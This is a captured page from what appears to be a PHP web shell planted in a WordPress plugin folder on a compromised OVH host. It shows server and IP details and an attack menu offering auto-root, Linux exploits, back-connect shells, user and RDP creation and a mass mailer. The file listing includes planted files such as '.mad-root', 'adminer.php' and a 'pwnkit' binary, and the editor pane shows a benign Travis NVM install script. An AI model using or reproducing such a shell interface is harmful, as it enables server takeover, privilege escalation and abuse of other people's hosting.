Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
plugins /
jetpack /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
travis_install.sh
513
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : travis_install.sh
# See more about this script here # http://austinpray.com/ops/2015/09/20/change-travis-node-version.html # Define a node version. TRAVIS_NODE_VERSION="5" # Clear out whatever version of NVM Travis has. # Their version of NVM is probably old. rm -rf ~/.nvm # Grab NVM. git clone https://github.com/creationix/nvm.git ~/.nvm # Checkout the latest stable tag. (cd ~/.nvm && git checkout `git describe --abbrev=0 --tags`) # Install the desired version of Node source ~/.nvm/nvm.sh nvm install $TRAVIS_NODE_VERSION
Close